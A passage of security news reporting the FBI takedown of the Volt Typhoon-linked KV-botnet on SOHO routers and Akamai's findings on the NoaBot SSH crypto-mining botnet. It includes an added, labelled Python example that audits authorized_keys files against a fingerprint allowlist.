This is accomplished by means of the KV-botnet, which commandeers devices from Cisco, DrayTek, Fortinet, and NETGEAR for use as a covert data transfer network for advanced persistent threat actors. It's suspected that the botnet operators offer their services to other hacking outfits, including Volt Typhoon.

In January 2024, a report from cybersecurity firm SecurityScorecard revealed how the botnet has been responsible for compromising as much as 30% — or 325 of 1,116 — of end-of-life Cisco RV320/325 routers over a 37-day period from December 1, 2023, to January 7, 2024.

"Volt Typhoon is at least one user of the KV-botnet and [...] this botnet encompasses a subset of their operational infrastructure," Lumen Black Lotus Labs said, adding the botnet "has been active since at least February 2022."

The botnet is also designed to download a virtual private network (VPN) module to the vulnerable routers and set up a direct encrypted communication channel to control the botnet and use it as an intermediary relay node to achieve their operational goals.

"One function of the KV-botnet is to transmit encrypted traffic between the infected SOHO routers, allowing the hackers to anonymize their activities (i.e., the hackers appear to be operating from the SOHO routers, versus their actual computers in China)," according to affidavits filed by the U.S. Federal Bureau of Investigation (FBI).

As part of its efforts to disrupt the botnet, the agency said it remotely issued commands to target routers in the U.S. using the malware's communication protocols to delete the KV-botnet payload and prevent them from being re-infected. The FBI said it also notified every victim about the operation, either directly or via their internet service provider if contact information was not available.

"The court-authorized operation deleted the KV-botnet malware from the routers and took additional steps to sever their connection to the botnet, such as blocking communications with other devices used to control the botnet," the DoJ added.

It's important to point out here that the unspecified prevention measures employed to remove the routers from the botnet are temporary and cannot survive a reboot. In other words, simply restarting the devices would render them susceptible to re-infection.

"The Volt Typhoon malware enabled China to hide, among other things, pre-operational reconnaissance and network exploitation against critical infrastructure like our communications, energy, transportation, and water sectors – steps China was taking, in other words, to find and prepare to destroy or degrade the civilian critical infrastructure that keeps us safe and prosperous," FBI Director Christopher Wray said.

However, the Chinese government, in a statement shared with Reuters, denied any involvement in the attacks, dismissing the claim as a "disinformation campaign" and stating that it "has been categorical in opposing hacking attacks and the abuse of information technology."

Coinciding with the takedown, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) published new guidance urging SOHO device manufacturers to embrace a secure by design approach during development and shift the burden away from customers.

Specifically, it's recommending that manufacturers eliminate exploitable defects in SOHO router web management interfaces and modify default device configurations to support automatic update capabilities and require a manual override to remove security settings.

The compromise of edge devices such as routers for use in advanced persistent attacks mounted by Russia and China highlights a growing problem that's compounded by the fact that legacy devices no longer receive security patches and do not support endpoint detection and response (EDR) solutions.

"The creation of products that lack appropriate security controls is unacceptable given the current threat environment," CISA said. "This case exemplifies how a lack of secure by design practices can lead to real-world harm both to customers and, in this case, our nation's critical infrastructure."


NoaBot: Latest Mirai-Based Botnet Targeting SSH Servers for Crypto Mining
11.1.24  BotNet  The Hacker News
A new Mirai-based botnet called NoaBot has been used by threat actors as part of a crypto mining campaign since the beginning of 2023.

"The capabilities of the new botnet, NoaBot, include a wormable self-spreader and an SSH key backdoor to download and execute additional binaries or spread itself to new victims," Akamai security researcher Stiv Kupchik said in a report shared with The Hacker News.

Mirai, which had its source code leaked in 2016, has been the progenitor of a number of botnets, the most recent being InfectedSlurs, which is capable of mounting distributed denial-of-service (DDoS) attacks.

There are indications that NoaBot could be linked to another botnet campaign involving a Rust-based malware family known as P2PInfect, which recently received an update to target routers and IoT devices.

This is based on the fact that threat actors have also experimented with dropping P2PInfect in place of NoaBot in recent attacks targeting SSH servers, indicating likely attempts to pivot to custom malware.

Despite NoaBot's Mirai foundations, its spreader module leverages an SSH scanner to search for servers susceptible to dictionary attacks in order to brute-force them and add an SSH public key to the .ssh/authorized_keys file for remote access. Optionally, it can also download and execute additional binaries after successful exploitation or propagate itself to new victims.
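Because the backdoor described above is simply an extra line in .ssh/authorized_keys, one way to catch it is to fingerprint every key in the file and compare against an allowlist. This is an added example, not code from the Akamai report or the article; the function names and the sample keys (constructed, non-functional blobs) are this example's own.

```python
import base64
import binascii
import hashlib
import struct


def make_blob(keytype, fill):
    """Build a constructed, non-functional key blob in SSH wire format."""
    t = keytype.encode()
    return struct.pack(">I", len(t)) + t + struct.pack(">I", 32) + bytes([fill]) * 32


def fingerprint(blob):
    """SHA256 fingerprint in the form printed by `ssh-keygen -l`."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_entry(line):
    """Return (options, keytype, blob, comment) for a key line, else None."""
    tokens = line.split()
    if not tokens or tokens[0].startswith("#"):
        return None
    for i in range(len(tokens) - 1):
        try:
            blob = base64.b64decode(tokens[i + 1], validate=True)
        except (binascii.Error, ValueError):
            continue
        if len(blob) < 4:
            continue
        (n,) = struct.unpack(">I", blob[:4])
        # The blob embeds its own type name; it must match the preceding token.
        if blob[4:4 + n] == tokens[i].encode():
            return " ".join(tokens[:i]), tokens[i], blob, " ".join(tokens[i + 2:])
    return None


def audit(text, allowed):
    """Return (lineno, keytype, fingerprint, comment) for keys not in `allowed`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry and fingerprint(entry[2]) not in allowed:
            findings.append((lineno, entry[1], fingerprint(entry[2]), entry[3]))
    return findings


# Constructed sample file: one known admin key, one key nobody recognises.
ADMIN, UNKNOWN = make_blob("ssh-ed25519", 0x11), make_blob("ssh-ed25519", 0x22)
SAMPLE = "\n".join([
    "# constructed authorized_keys content",
    'from="10.0.0.0/8",no-pty ssh-ed25519 %s admin@example' % base64.b64encode(ADMIN).decode(),
    "ssh-ed25519 %s" % base64.b64encode(UNKNOWN).decode(),
])
```

Calling `audit(SAMPLE, {fingerprint(ADMIN)})` reports only the unrecognised key on line 3; in practice the allowlist would come from a key inventory and the check would run over every account's file.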


"NoaBot is compiled with uClibc, which seems to change how antivirus engines detect the malware," Kupchik noted. "While other Mirai variants are usually detected with a Mirai signature, NoaBot's antivirus signatures are of an SSH scanner or a generic trojan."

Besides incorporating obfuscation tactics to render analysis challenging, the attack chain ultimately results in the deployment of a modified version of the XMRig coin miner.

What makes the new variant a cut above other similar Mirai botnet-based campaigns is that it does not contain any information about the mining pool or the wallet address, thereby making it impossible to assess the profitability of the illicit cryptocurrency mining scheme.

"The miner obfuscates its configuration and also uses a custom mining pool to avoid exposing the wallet address used by the miner," Kupchik said, highlighting some level of preparedness of the threat actors.

Akamai said it identified 849 victim IP addresses to date that are spread geographically across the world, with high concentrations reported in China, so much so that it amounts to almost 10% of all attacks against its honeypots in 2023.

"The malware's method of lateral movement is via plain old SSH credentials dictionary attacks," Kupchik said. "Restricting arbitrary internet SSH access to your network greatly diminishes the risks of infection. In addition, using strong (not default or randomly generated) passwords also makes your network more secure, as the malware uses a basic list of guessable passwords."